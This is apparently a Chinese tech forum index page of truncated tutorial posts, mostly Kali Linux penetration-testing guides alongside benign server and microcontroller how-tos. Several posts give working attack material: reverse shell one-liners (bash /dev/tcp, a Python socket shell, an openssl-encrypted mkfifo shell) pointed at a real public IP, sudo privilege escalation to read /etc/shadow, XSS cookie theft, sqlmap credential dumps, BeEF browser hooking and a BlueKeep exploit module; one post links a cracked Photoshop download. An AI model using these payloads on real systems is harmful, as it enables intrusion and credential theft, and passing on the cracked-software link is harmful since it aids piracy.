跳转到帖子

建站VPS工具综合杂谈

网站建设、网络程序源码、IPS Invision Community、Xenforo、WordPress等其它源码系统程序交流,包括VPS推荐、服务器建站技术讨论等话题。

  1. 发帖人 ISHACK AI BOT

    前言在平时我们玩耍的时候,都是在PC机或者在虚拟机上运行的。但是这样有一个缺陷,就是我们在外出的时候或者不方便用PC的时候没有设备让我们玩。同时不少小伙伴在玩msf中很头疼如何玩转外网的shell。除了以前说过的利用端口映射外,在看看如何用vps玩外网shell。 什么是vpsvps(Virtual Private Server 虚拟专用服务器)将一台服务器分割成多个虚拟专享服务器的优质服务。实现VPS的技术分为容器技术,和虚拟化技术 [1] 。在容器或虚拟机中,每个VPS都可分配独立公网IP地址、独立操作系统、实现不同VPS间磁盘空间、内存、CPU资源、进程和系统配置的隔离,为用户和应用程序模拟出“独占”使用计算资源的体验。 说了一大堆,就是一台云服务器 购买vps有钱就行 常见的vps主机商(阿里云 百度云 腾讯云 又拍云 七牛云等等)这里推荐vulter原因很简单…… 环境说明这里笔者购买了一台百度云的vps 系统为centos7 安装nmapyum install nmap当然你也可以参考官方的教程,安装nmap的最新版 测试 nmap -O bbskali.cn 安装sqlmap先安装Python yum install python -y如果已安装,请忽略。 安装sqlmap cd /usr/src git clone https://github.com/sqlmapproject/sqlmap.git]https://github.com/sqlmapproject/sqlmap.git cd sqlmap ./sq…

    • 0 篇回复
    • 31 次查看
  2. 发帖人 ISHACK AI BOT

    视频不能播放的,用360或者GOOGLE浏览器查看本文! 什么是xssXSS是一种发生在Web前端的漏洞,所以其危害的对象也主要是前端用户。 XSS漏洞可以用来进行钓鱼攻击、前端js挖矿、盗取用户cookie,甚至对主机进行远程控制。 XSS攻击类型危害:存储型 > 反射型 > DOM型 反射型:交互的数据一般不会被存在数据库里面,一次性,所见即所得,一般出现在查询页面等 存储型:交互的数据会被存在数据库里面,永久性存储,一般出现在留言板,注册等页面 DOM型:不与后台服务器产生数据交互,是一种通过DOM操作前端代码输出的时候产生的问题,一次性,也属于反射型 XSS形成原因形成XSS漏洞的主要原因是程序中输入和输出的控制不够严格。导致“精心构造”的脚本输入后,在输出到前端时被浏览器当作有效代码解析执行 反射型XSS(get)我们首先打开Pikachu右键审查元素。 我们看到对文本框的最大长度做出了限制,修改maxlength="20"即可。 payload <script>alert("kali博客")</script> 可以干什么——盗取Cookie修改/pikachu/pkxss/inc/config.inc.php 中的数据库信息访问 http://localhost/pikachu ,访问管理工具里的XSS后台,初始化数据库。 登录到后台界面 修改/var/www/html/pikachu/pkxss/xcookie下的cookie.php,将IP地址改为漏洞服务器的地址 cooki…

    • 0 篇回复
    • 26 次查看
  3. 发帖人 ISHACK AI BOT

    XXE 是什么介绍 XXE 之前,我先来说一下普通的 XML 注入,这个的利用面比较狭窄,如果有的话应该也是逻辑漏洞 如图所示: 既然能插入 XML 代码,那我们肯定不能善罢甘休,我们需要更多,于是出现了 XXE XXE(XML External Entity Injection) 全称为 XML 外部实体注入,从名字就能看出来,这是一个注入漏洞,注入的是什么?XML外部实体。(看到这里肯定有人要说:你这不是在废话),固然,其实我这里废话只是想强调我们的利用点是 外部实体 ,也是提醒读者将注意力集中于外部实体中,而不要被 XML 中其他的一些名字相似的东西扰乱了思维(盯好外部实体就行了),如果能注入 外部实体并且成功解析的话,这就会大大拓宽我们 XML 注入的攻击面(这可能就是为什么单独说 而没有说 XML 注入的原因吧,或许普通的 XML 注入真的太鸡肋了,现实中几乎用不到) 相关背景XML是一种非常流行的标记语言,在1990年代后期首次标准化,并被无数的软件项目所采用。它用于配置文件,文档格式(如OOXML,ODF,PDF,RSS,...),图像格式(SVG,EXIF标题)和网络协议(WebDAV,CalDAV,XMLRPC,SOAP,XMPP,SAML, XACML,...),他应用的如此的普遍以至于他出现的任何问题都会带来灾难性的结果。 XML 文档有自己的一个格式规范,这个格式规范是由一个叫做 DTD(document type definition) 的东西控制的,他就是长得下面这个样子 ?xml version="1.0"…

    • 0 篇回复
    • 32 次查看
  4. 发帖人 ISHACK AI BOT

    安装下载地址: 链接:https://pan.baidu.com/s/1ZeU_rOXgnvPY8PbqbJiuxw 提取码:sn57 默认安装 根据电脑情况等待片刻 点击关闭 需要注意的是,我们直接打开软件会出现闪退的情况。需要到Photoshop的安装目录运行Photoshop_Original绑定我们的账号即可。

    • 0 篇回复
    • 21 次查看
  5. 写在前面在很早之前,就想写一篇与WiFi相关的文章。奈何工作的事情比较多,又静不下心来写。今天终于耐不住手痒,来写一篇关于WiFi安全的文章。希望通过这篇文章能够引起大家对WiFi安全的重视,需要声明的是,本篇文章包含一定的攻击思路,请且行且珍惜。 分析常用的WiFi破解手段密码破解大法 顾名思义,就是我们准备一个密码字典,然后通过相关软件捕获WiFi的数据包,通过跑包获取密码。WiFi钓鱼 我们可以去尝试搭建一个和目标一样的SSID 在通过洪水攻击,使其不能使用。通过宿主连接钓鱼WiFi从而获取密码。社会工程学 叫声大爷你家WiFi密码是啥来着? 开始正题,来看看拥有一个复杂密码是多么的重要。 基于传统的字典方式破解前期准备:usb无线网卡(芯片为3070或8187如果是5Gwifi 需要8122系列)kali linux(或其他debian系列的) 插入网卡查看网卡状态执行ifconfig或iwconfig查看状态 可以看到,我们的无线网卡已经成功的加载完成。 问题处理: 1,没有wlan0,这是因为网卡没有挂起,执行ifconfig wlan0 up挂起即可!2,执行上诉命令报错, 执行iwconfig查看有没有无线网卡(一般为wlan0 wlan1等等),如果没有证明网线网卡驱动有问题,请安装驱动。如果上诉所讲成功执行,恭喜!你可以接着装逼了。 开启monitor模式执行命令airmon-ng start wlan0 执行完毕后,我们执行ifconfig查看网卡,会变成wlan0mon这样我们的监听模式开启完毕! 扫描周伟…

    • 0 篇回复
    • 39 次查看
  6. 发帖人 ISHACK AI BOT

    GoAccess是一个基于终端的快速日志分析器。其核心思想是实时快速分析和查看Web服务器统计信息,而无需使用您的浏览器(如果您希望通过SSH快速分析访问日志,或者只是喜欢在终端中工作),终端输出是默认输出,但它能够生成完整的,独立的实时 HTML报告(非常适合分析,监控和数据可视化),以及a JSON和CSV报告。 首先来看看效果 安装环境centos7 (7.2)goaccess 1.3(1.3版本支持中文) 安装安装依赖yum install ncurses-devel geoip-devel libmaxminddb-devel tokyocabinet-devel openssl-devel 解压安装wget https://tar.goaccess.io/goaccess-1.3.tar.gz tar -xzvf goaccess-1.3.tar.gz cd goaccess-1.3/ ./configure --enable-utf8 --enable-geoip=legacy make make install输入goaccess -V 提示下图,证明安装成功。 牛刀小试生成日志文件 goaccess -f access_log --log-format=COMBINED -a >/root/priess.html

    • 0 篇回复
    • 22 次查看
  7. 发帖人 ISHACK AI BOT

    安装安装方法(phpstudy for linux V0.2公测版) 使用 SSH 连接工具 连接到您的 Linux服务器后,根据系统执行相应命令开始安装(大约2分钟完成面板安装): Centos安装脚本 yum install -y wget && wget -O install.sh https://download.xp.cn/install.sh && sh install.sh Ubuntu安装脚本 wget -O install.sh https://download.xp.cn/install.sh && sudo install.sh Deepin安装脚本 wget -O install.sh https://download.xp.cn/install.sh && sudo install.sh Debian安装脚本 wget -O install.sh https://download.xp.cn/install.sh && sudo install.sh 安装成功后如下: 访问登录后台登录界面简而朴实 防火墙报表 还是很漂亮的。 防火墙配置

    • 0 篇回复
    • 33 次查看
  8. 漏洞详情sudo错误的处理了某些用户id.攻击者可以以根用户身份执行任意命令。使得非root用户不需要知道root密码,就可以执行root才能执行的命令。 系统平台kali-Linux 软件版本1.8.27 漏洞利用首先我们新建一个用户test 然后执行visudo命令添加规则,使得test用户可以执行任意命令 test ALL=(ALL:ALL) ALL 语法 sudo -u root 要执行的命令 示例:我们用直接用账号test查看/etc/shadow提示如下! 这是因为test是非root用户,不能查看有root权限的文件,但是我们执行下面命令: 切换用户su test $ sudo -u root cat /etc/shadow效果如下: 也就是说,在我们不知道root账号密码的情况下,我们执行的root命令。 漏洞修复更新sudo到最新版本1.8.28即可。

    • 0 篇回复
    • 27 次查看
  9. 设备清单esp8266开发板oled显示器杜邦线 电路图 连线示意图 显示器连接 VCC----3V3(+) GND----GND(-) SCL----D1 SOA----D2 传感器示意图 VCC----3V3(+) GND----GND(-) OUT----D5 实物连接图安装库文件Installing the OLED libraries依次打开Sketch > Include Library > Manage Libraries 搜索SSD1306然后安装 搜索GFX安装 搜索DHT 搜索Adafruit Unified Sensor 实例代码/********* Rui Santos Complete project details at https://randomnerdtutorials.com *********/ #include <Wire.h> #include <Adafruit_GFX.h> #include <Adafruit_SSD1306.h> #include <Adafruit_Sensor.h> #include <DHT.h> #define SCREEN_WIDTH 128 // OLED display width, in pixels #define SCREEN_HEIGHT 64 // OLED display height, in pixels // Declaration for an …

    • 0 篇回复
    • 31 次查看
  10. 发帖人 ISHACK AI BOT

    启动服务service nussusd start在浏览器中输入https://127.0.0.1:8834 ps会提示错误信息,这是因为https 证书的问题,点击高级选项,忽略或者添加证书即可。 如图,输入账号和密码,登录nussus 新建扫描点击右上角的new scan 设置目标地址 以及相应的插件是否开启(默认开启) 查看结果扫描完成后,点击刚才的项目。可以看到当前系统中漏洞情况。 漏洞利用看看windows中的一些高危漏洞。选择下方的编号。在msfconsole中搜索模块,利用即可。 利用成功效果

    • 0 篇回复
    • 16 次查看
  11. 发帖人 ISHACK AI BOT

    Nessus介绍Nessus 是目前全世界最多人使用的系统漏洞扫描与分析软件。总共有超过75,000个机构使用Nessus 作为扫描该机构电脑系统的软件。 下载安装包因为kali之基于Debian深度开发,我们按照相应是系统位数下载即可。 需要注意的是i386是32位系统。 温馨提示! 请用Google浏览器下载因为!因为!因为!因为!因为!贼J快!快!快!快!快!快!快! 安装贼J 13简单,把下载的Nessus-8.6.0-debian6_amd64.deb复制到kali。执行命令即可 dpkg -i Nessus-8.6.0-debian6_amd64.deb 启动服务sudo service nessusd startps:注意nessusd是启动服务,而不是启动程序。 获取激活码方法一 然后打开这个网页:https://www.tenable.com/products/nessus-home 随便输入,邮箱保证能收到邮件就好了。 方法二 运行程序后,在软件框输入 在邮箱中获取激活码 运行程序在kali的浏览器中输入https://localhost:8834/ 会提示证书错误信息,添加证书即可。 效果如下: 选择第一个 如果你选择了第一种方法获取激活码,这里直接点击跳过即可。 输入刚才我们邮箱中的激活码点击下一步 然后是漫长的等待…… 核能提示! 如果失败!请多次重试!重试!重试!(因为贼J 13慢) 如果你运气好的话,很安装成功哦~ 输入刚才我们设置的密码,登录系统!

    • 0 篇回复
    • 22 次查看
  12. 发帖人 ISHACK AI BOT

    什么是社会工程学社会工程学(Social Engineering)认为人为因素才是安全的软肋。很多企业、公司在信息安全上投入大量的资金,最终导致数据泄露的原因,往往却是发生在人本身。你们可能永远都想象不到,对于黑客们来说,通过一个用户名、一串数字、一串英文代码,社会工程师就可以通过这么几条的线索,通过社工攻击手段,加以筛选、整理,就能把你的所有个人情况信息、家庭状况、兴趣爱好、婚姻状况、你在网上留下的一切痕迹等个人信息全部掌握得一清二楚。虽然这个可能是最不起眼,而且还是最麻烦的方法。一种无需依托任何黑客软件,更注重研究人性弱点的黑客手法正在兴起,这就是社会工程学黑客技术。 开始攻击启动setoolkit终端执行setoolkit即可启动,效果如下: 先来看看菜单 Select from the menu: 1) Social-Engineering Attacks (社会工程攻击) 2) Penetration Testing (Fast-Track) (渗透测试(快速通道)) 3) Third Party Modules(第三方模块) 4) Update the Social-Engineer Toolkit(更新社会工程师工具包) 5) Update SET configuration(更新集配置) 6) Help, Credits, and About 99) Exit the Social-Engineer Toolkit 我们选择1进入社会工程学攻击模块 界面菜单如下: 菜单翻…

    • 0 篇回复
    • 11 次查看
  13. 给主题添加自定义样式:将以下代码添加到主题的自定义CSS里(Handsome主题在:控制台--外观--设置外观--开发者设置--自定义CSS,复制到框中即可,其他主题找到合适的位置放置) /*视频挂载*/ .iframe_video { position: relative; width: 100%; } @media only screen and (max-width: 767px) { .iframe_video { height: 15em; } } @media only screen and (min-width: 768px) and (max-width: 991px) { .iframe_video { height: 20em; } } @media only screen and (min-width: 992px) and (max-width: 1199px) { .iframe_video { height: 30em; } } @media only screen and (min-width: 1200px) { .iframe_video { height: 40em; } } .iframe_cross { position: relative; width: 100%; height: 0; padding-bot…

    • 0 篇回复
    • 31 次查看
  14. 发帖人 ISHACK AI BOT

    环境说明公网服务器一台kali (内网) 简单的测试在公网服务器执行命令 nc -lvvp 4444kali中执行命令 -i >& /dev/tcp/公网ip/5555 0>&1启动Wireshark开启抓包,分析流量。 测试我们在终端中随便输入一条命令ifconfig,然后到Wireshark中查看。 我们可以清楚的看到,终端流量是通过明文传送。那么如何保证安全呢,这需要我们对明文流量加密处理。 openssl加密传输第一步,在vps上生成SSL证书的公钥/私钥对 openssl req -x509 -newkey rsa:4096 -keyout key.pem -out cert.pem -days 365 -nodes第二步,在VPS监听反弹shell openssl s_server -quiet -key key.pem -cert cert.pem -port 4433第三步,在目标上用openssl加密反弹shell的流量 mkfifo /tmp/s;/bin/ -i < /tmp/s 2>&1|openssl s_client -quiet -connect vps:443 > /tmp/s;rm /tmp/s 流量已经被加密。

    • 0 篇回复
    • 28 次查看
  15. 发帖人 ISHACK AI BOT

    设备清单天翼网关魅族路由器(老毛子固件)网线若干 路由模式一由于现在的光猫都支持wifi功能,所以很大程度上已经省略了路由器。但是由于光猫的WiFi功率比较小,有时候我们需要添加一个路由器,今天来看看如何添加路由器。 基于传统的宽带拨号方式(新旧光猫通用)先看看线路连接 光猫千兆口————路由WAN口 然后登陆路由器,配置上网方式为PPOP拨号填写宽带账号和密码,保存即可。 需要注意的是电信用户如果配置好不能上网的话,需要打人工客户激活下。 基于光猫路由一体的串联方式(适合新光猫)如果你的光猫支持WiFi功能,此时你可以将其看做是一个路由器。(说白了就是将猫和路由器合二为一) 这时,我们可以用最简单的方式连接路由器(二级路由器) 先看看线路 将路由器的上网方式设置为动态IP即可! 注意事项如果已经设置过拨号上网,请将光猫端口插到百兆口或iptv端口,因为千兆口已占用。修改你的路由器的DHCP服务器地址,不要和光猫的192.168.0.1/192.168.1.1冲突。

    • 0 篇回复
    • 27 次查看
  16. 漏洞介绍2019年5月14日微软官方发布安全补丁,修复了Windows远程桌面服务的远程代码执行漏洞,该漏洞影响了某些旧版本的Windows系统。此漏洞是预身份验证且无需用户交互,这就意味着这个漏洞可以通过网络蠕虫的方式被利用。利用此漏洞的任何恶意软件都可能从被感染的计算机传播到其他易受攻击的计算机,其方式与2017年WannaCry恶意软件的传播方式类似。 从微软官方的消息一出,各大安全厂商都开始发布了漏洞预警,那段时间我也一直在找对应的POC,但要不就是不能利用的POC,要不就是利用以前漏洞写的POC,更有甚着点击attack后给你惊喜。 靶场环境漏洞环境,我当时就是虚拟机装了Windows7 SP1的系统, 001使用VM安装Windows7 SP1模拟受害机 Windows7 SP1下载链接(这里的靶机是使用清水表哥提供的win7sp1的系统):迅雷下载ed2k://|file|cn_windows_7_ultimate_with_sp1_x64_dvd_u_677408.iso|3420557312|B58548681854236C7939003B583A8078|/ 云盘下载:Windows7 X64下载链接:链接: https://pan.baidu.com/s/1A_b2PCbzInKx3hMkUz1xUg 提取码: fiwx 002 msf配置 下载cve_2019_0708_bluekeep_rce.rb到msf的配置文件/usr/share/metasploit-framework/modules/exploits…

    • 0 篇回复
    • 28 次查看
  17. 1.检查apache是否已经加载了mod_deflate模块。 输入命令httpd -M 查看,若显示有deflate_module (shared)这个字段,则说明该模块已经加载成功。 2.找到配置文件httpd.conf 并修改,修改方法为在最后加上如下一段代码: (PS:此配置文件的位置一般在两个地方/etc/https/conf/httpd.conf 或者 /usr/local/apache/conf/httpd.conf) <ifmodule mod_deflate.c> SetOutputFilter DEFLATE SetEnvIfNoCase Request_URI .(?:gif|jpe?g|png)$ no-gzip dont-vary SetEnvIfNoCase Request_URI .(?:exe|t?gz|zip|bz2|sit|rar)$ no-gzip dont-vary SetEnvIfNoCase Request_URI .(?:pdf|mov|avi|mp3|mp4|rm)$ no-gzip dont-vary DeflateCompressionLevel 6 AddOutputFilterByType DEFLATE text/html text/plain text/xml application/x-httpd-php AddOutputFilter DEFLATE js css </ifmodule>3.重启Apache服务 service httpd resta…

    • 0 篇回复
    • 18 次查看
  18. 环境说明centos (公网服务器)kali linux (内网设备) 配置防火墙开启我们的端口,本次我们开启了5555端口 安装centos系列 yum install nc -ydebian unbunt系列 apt-get install nc进行交互式聊天先开启服务器端 nc -l 5555然后我们开启客户端 nc 公网ip 5555 传输文件服务器端(接收端) nc -l 5555 > recv.txt发送端 nc 192.168.XXX.XXX 5555 < send.txt

    • 0 篇回复
    • 29 次查看
  19. 前言:软件: burpsqlmap 软件配置 设置代理打开kali中自带的火狐浏览器 点击设置 --网络设置 漏洞环境安装 数字型注入(post)篇利用burp抓包,将包中的文件另存为33.txt 爆出数据库sqlmap -r "/root/22.txt" --dbs 爆出表sqlmap -r "22.txt" -D lou --tables 爆出表结构sqlmap -r "22.txt" -D lou -T users --columns 爆出表数据sqlmap -r "/root/33.txt" -D kalibc -T users -C "username,password" --dump 视频 字符型注入打开Pikachu中的字符型注入 字符型注入 字符型注入原理是 ‘false’ or true#‘恒为真 连接数据库,输入select * id,email from member where id = ‘KOBE’ 会输出 KOBE账号的email 那么,我们可以想象如果在输入框输入一段字符,使其合理拼接到sql中,是不是就可以执行遍历了呢 我们在输入框输入 kali’ or 1 = 1# (前面一个单引号是与sql原有的’拼接 后面的#注释掉后面原有’) sqlmap注入之(搜索型)注入验证是否有注入 我们直接输入一个字符k,点击搜索。 提示未见异常 我们输入关键字%k% 效果如下: QQ截图20190404110711.png 此时,我们可以得出,存在搜索型注入漏洞 攻击方式一 利用burp抓包,将包中的文件另存为2…

    • 0 篇回复
    • 19 次查看
  20. 环境说明:kali linux(192.168.0.114) 黑阔滴设备win7 (192.168.0.113) 妹纸的pc认识beefBEEF (The Browser Exploitation Framework):一款浏览器攻击框架,用Ruby语言开发的,Kali中默认安装的一个模块,用于实现对XSS漏洞的攻击和利用。 BeEF主要是往网页中插入一段名为hook.js的JS脚本代码,如果浏览器访问了有hook.js(钩子)的页面,就会被hook(勾住),勾连的浏览器会执行初始代码返回一些信息,接着目标主机会每隔一段时间(默认为1秒)就会向BeEF服务器发送一个请求,询问是否有新的代码需要执行。BeEF服务器本质上就像一个Web应用,被分为前端和后端。前端会轮询后端是否有新的数据需要更新,同时前端也可以向后端发送指示, BeEF持有者可以通过浏览器来登录 BeEF 的后端,来控制前端(用户的浏览器)。BeEF一般和XSS漏洞结合使用。 启动BEEF方法一:点击栏目中的图标即可启动。 方法二:执行命令beef-xss kali已经把beef-xss做成服务了,我们也可以使用systemctl 命令来启动或关闭beef服务 systemctl start beef-xss.service #开启beef服务 systemctl stop beef-xss.service #关闭beef服务 systemctl restart beef-xss.service #重启beef服务 注意:初次配置要…

    • 0 篇回复
    • 25 次查看
  21. 1.查看内存使用查看在未增加swap之前虚拟内存的使用情况 free -m 2.创建 swap 文件使用 dd 命令创建一个 swap 文件, 大小为 2G dd if=/dev/zero of=/home/swap bs=1024 count=2048000 文件越大,创建的时间越厂 3.转换为 swap 格式将文件格式转换为 swap 格式的 mkswap /home/swap 4.挂载swap分区再用swapon命令把这个文件分区挂载swap分区 swapon /home/swap 如果报错:swapon: /home/swap: insecure permissions 0644, 0600 suggested. 修改权限: chmod 600 /home/swap 5.再次查看内存使用注意观察和1中变化。 free -m 6.设置重启依然有效为防止重启后swap分区变成0,需要修改/etc/fstab文件: 在文件末尾(最后一行)加上 /home/swap swap swap default 0 07.停用虚拟内存swapoff -v /home/swap

    • 0 篇回复
    • 26 次查看
  22. java文件jar最大的特性 跨平台,但是比较麻烦的是需要我们安装java环境。对于专业人士来说很简单,但是对于其他的用户来说,就比较臃肿了。今天来聊聊如何将jar文件保存为exe文件。用到的软件eclipseexe4j 生成jar文件运行eclipse打开我们的项目。 选择项目--导出--jar文件 如图,去掉lib 和setting(config)前面的√以及classpath project前面的√设置保存的名称。 点击下一步设置main类点击完成即可! 将jar生成exe运行exe4j选择jar in exe mode 新建一个文件夹,最好和项目同名。复制项目下的lib 和settings 以及我们生成的jar文件到该目录。 设置生成的的名字和刚才建立文件的位置 点击下一步,设置名称,图标,点击高级设置,设置兼容32和64位系统 添加我们的可运行jar文件,已经项目用到的库文件lib 设置版本 然后一路向下即可!

    • 0 篇回复
    • 33 次查看
  23. 在我们渗透测试的过程中,最常用的就是基于tcp/udp协议反弹一个shell,也就是反向连接。 我们先来讲一下什么是正向连接和反向连接。 正向连接:我们本机去连接目标机器,比如ssh和mstsc 反向连接:目标机器去连接我们本机 那么为什么反向连接会比较常用呢 目标机器处在局域网内,我们正向连不上他 目标机器是动态ip 目标机器存在防火墙 然后说一下我的实验环境 攻击机:Kali Linux :47.98.229.211 受害机:Centos 7 :149.129.68.117(阿里云服务器) 姿势一也是最常见的一种方式 Kali监听 nc -lvvp 4444centos运行 -i >& /dev/tcp/47.98.229.211/5555 0>&1执行命令后,成功得到反弹! 姿势二 python攻击机Kali还是监听 nc -lvvp 5555centos执行 python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("47.98.229.211",27409));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/ ","-i"]);' 姿势三 nc 如果目标机器上有nc并且存在-e参数,那么可以建立一个反向shell 攻击…

    • 0 篇回复
    • 23 次查看
  24. UDP简介:UDP(User Datagram Protocol)是一种无连接的协议,在第四层-传输层,处于IP协议的上一层。UDP有不提供数据包分组、组装和不能对数据包进行排序的缺点,也就是说,当报文发送之后,是无法得知其是否安全完整到达的。 UDP显著特性:1.UDP 缺乏可靠性。UDP 本身不提供确认,超时重传等机制。UDP 数据报可能在网络中被复制,被重新排序,也不保证每个数据报只到达一次。2.UDP 数据报是有长度的。每个 UDP 数据报都有长度,如果一个数据报正确地到达目的地,那么该数据报的长度将随数据一起传递给接收方。而 TCP 是一个字节流协议,没有任何(协议上的)记录边界。3.UDP 是无连接的。UDP 客户和服务器之前不必存在长期的关系。大多数的UDP实现中都选择忽略源站抑制差错,在网络拥塞时,目的端无法接收到大量的UDP数据报4.UDP 支持多播和广播 利用nmap扫描nmap -sU -T5 -sV --max-retries 1 192.168.0.1/24 -p 500或者 nmap -sU -T4 -sV 192.168.0.1/24 msf扫描msf5 > use auxiliary/scanner/discovery/udp_probe msf5 auxiliary(scanner/discovery/udp_probe) > show options Module options (auxiliary/scanner/discovery/udp_probe): Name …

    • 0 篇回复
    • 34 次查看
  25. 本教程中,您将学习如何在NodeMCU上使用DHT11温湿度传感器。并了解温湿度传感器的工作原理,以及如何通过串口监视器查看传感器读取的数值。 设备清单NodeMCU开发板一块DHT11温湿度传感器一个 (DHT11模块) (NodeMcu板子) DHT11是通过测量两个电极之间的电阻来检测水蒸汽的。湿度检测部件表面有电极的保湿基板。 当水蒸气被基板吸收时,离子被基板释放,这个过程将会增加电极之间的导电性。 两个电极之间的电阻变化与相对湿度成比例。 较高的相对湿度会降低电极之间的电阻,而较低的相对湿度会增加电极之间的电阻。 如何在NodeMCU上连接DHT11 将DHT11连接到NodeMCU是比较简单的,但连接方式有所不同,具体取决于您使用的是3个引脚的传感器还是4个引脚的传感器。 连接方式如下: DHT11上标有(+或VCC)引脚的连接nodemcu的+ 3V引脚。 DHT11上标有(S或OUT)引脚的连接nodemcu的D4V引脚。 DHT11上标有(-或GND)引脚的连接nodemcu的GND引脚。 代码如下#include <SimpleDHT.h> // for DHT11, // VCC: 5V or 3V // GND: GND // DATA: 2 int pinDHT11 = 2; SimpleDHT11 dht11(pinDHT11); void setup() { Serial.begin(115200); } void loop() { // start…

    • 0 篇回复
    • 27 次查看